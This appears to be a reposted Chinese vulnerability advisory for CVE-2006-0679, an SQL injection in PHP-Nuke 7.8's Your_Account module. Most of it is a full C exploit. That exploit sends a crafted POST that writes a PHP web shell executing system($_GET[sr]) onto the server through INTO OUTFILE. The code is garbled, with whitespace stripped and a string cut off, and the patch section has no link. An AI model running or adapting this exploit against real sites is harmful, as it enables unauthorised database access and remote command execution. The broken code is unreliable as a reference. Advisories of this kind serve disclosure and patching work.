PHP-Nuke Your_Account模块远程SQL注入漏洞

www.hx99.org 阅读: 时间:2007-07-09 整理:华西黑盟
------------------------------------------------------------------

 

发布日期：2006-02-28
更新日期：2006-02-28

受影响系统：
PHP-NukePHP-Nuke7.8
不受影响系统：
PHP-NukePHP-Nuke7.9+patch3.1
描述：
--------------------------------------------------------------------------------
BUGTRAQ ID:16691
CVE(CAN)ID:CVE-2006-0679

PHP-Nuke是一个广为流行的网站创建和管理工具，它可以使用很多数据库软件作为后端，比如MySQL、PostgreSQL、mSQL、Interbase、Sybase等。

PHP-Nuke的Your_Account模块实现上存在输入验证漏洞，远程攻击者可能利用此漏洞对服务器程序执行SQL注入攻击。

PHP-Nuke的Your_Account模块没有对username参数做充分的过滤检查，远程攻击者可能在此参数中插入恶意的SQL命令，从而非授权获取对后台数据库的操作。

<*来源：sp3x（sp3＠xsecurityreason.com）
 
 链接：
*>

测试方法：
--------------------------------------------------------------------------------

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

sp3x（sp3＠xsecurityreason.com）提供了如下测试代码：

/*==================================================\
#SecurityReason.com|
#(sp3x)|
#|
#/---------------------------\|
#|CtiticalSQLINCJECTION||
#|PHPNuke<=7.8||
#\---------------------------/|
#|
#PHPNuke-sp3x[1]|
#Thisexploitisbasedon'username'|
#SQLinjectionvulninYour_Accountmodule.|
#|
#References:|
#securityreason.com/achievement_securityalert/32|
#|
#---|workonlyonmysqlversion>4.0|---|
#|
#==================================================*/

#include<stdio.h>
#include<stdlib.h>
#include<string.h>
#include<sys/types.h>
#include<sys/socket.h>
#include<netinet/in.h>
#include<netdb.h>

#definePORT80//portofthewebserver

voidbegin(void);
voidsqlinj(intsock,char*argv[]);

intmain(intargc,char*argv[]){

intsock;
structsockaddr_inaddr;
structhostent*hp=0;

if(argc!=4){
begin();
}

if((sock=socket(AF_INET,SOCK_STREAM,0))<0){
printf("\n\n[-]Creatingsocket[FAILED]\n\n");
exit(EXIT_FAILURE);
}

printf("\n\n[+]Creatingsocket[OK]\n");

if((hp=gethostbyname(argv[1]))==0){
printf("[-]Resolving%s[FAILED]\n\n",argv[1]);
exit(EXIT_FAILURE);
}

printf("[+]Resolving%s[OK]\n",argv[1]);

memset(&addr,0,sizeof(addr));
memcpy((char*)&addr.sin_addr,hp->h_addr,hp->h_length);
addr.sin_family=AF_INET;
addr.sin_port=htons(PORT);

if(connect(sock,(structsockaddr*)&addr,sizeof(addr))<0){
printf("[-]Connectingat%s[FAILED]\n\n",argv[1]);
exit(EXIT_FAILURE);
}

printf("[+]Connectingat%s[OK]\n",argv[1]);

sqlinj(sock,argv);

printf("[+]Nowchecktheshell\n"
"[+]]);

shutdown(sock,2);
close(sock);

return(0);

}

voidbegin(void){

printf("*---------------------------------------*\n"
"*SecurityReason*\n"
"*EXPLOITforPHPNuke<=7.8*\n"
"*Codedby:sp3xDate:16.02.2006*\n"
"*---------------------------------------*\n\n"
"Usage:\n"
"PHPNuke-sp3x[1]HOST/[path_phpnuke][s_directory]\n\n"
"HOST-Hostwhereisphpnukeexample:localhost\n"
"[path_phpnuke]-PHPNukedirectory\n"
"[s_directory]-shelldirectorywheretoupload\n\n"
"Example:\n\n"
"PHPNuke-sp3x[1]/phpnuke/html//home/sp3x/nuke78/html/shell.php\n"
"Afterthisgoto\n\n");
exit(0);
return;

}

voidsqlinj(intsock,char*argv[]){

FILE*go;
intsize=264;
go=fdopen(sock,"a");
if(go==0){
perror("[-]fdopen[FAILED]\n\n");
close(sock);
exit(EXIT_FAILURE);
}

setbuf(go,NULL);

size+=strlen(argv[3]);

fprintf(go,"POST%sHTTP/1.0\n"
"Connection:Keep-Alive\n"
"Pragma:no-cache\n"
"Cache-control:no-cache\n"
"Accept:text/html,image/jpeg,image/png,text/*,image/*,*/*\n"
"Accept-Encoding:x-gzip,x-deflate,gzip,deflate,identity\n"
"Accept-Charset:iso-8859-1,utf-8;q=0.5,*;q=0.5\n"
"Accept-Language:en\n"
"Host:%s\n"
"Referer:user\n"
"User-Agent:SecurityReason-[SR]\n"
"Content-Type:application/x-www-form-urlencoded\n"
"Content-Length:%d\n\n"
"name=Your_Account&op=new&"
"user_password=hackme&user_password2=hackme&username="
"s'/**/UNION/**/SELECT/**/'<?echo\"SecurityReasonShell\";system($_GET
[sr]);'/**/FROM/**/nuke_authors/**/INTO/**/OUTFILE/**/'%s'/*\n\n"
"Cookie:lang=english\r\n\r\n",argv[2],argv[1],argv[1],argv[2],size,argv[3]);
printf("[+]Sendingexploit[OK]\n\n");

}

建议：
--------------------------------------------------------------------------------
厂商补丁：

PHP-Nuke
--------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

【免费加入会员】【我要投稿】【关闭本页】